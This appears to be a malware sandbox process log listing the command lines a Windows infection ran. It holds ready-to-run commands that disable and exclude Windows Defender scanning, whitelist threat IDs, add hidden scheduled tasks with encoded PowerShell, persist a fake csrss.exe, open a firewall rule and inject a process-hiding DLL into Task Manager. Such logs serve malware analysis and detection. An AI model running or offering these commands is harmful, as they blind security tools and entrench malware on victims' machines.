"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glrLJrRva" /SC once /ST 08:51:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4904 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glrLJrRva"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4748 -ip 4748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2164
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"
C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glrLJrRva"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe\" r1 /LNsite_idduL 525403 /S" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe
C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe r1 /LNsite_idduL 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
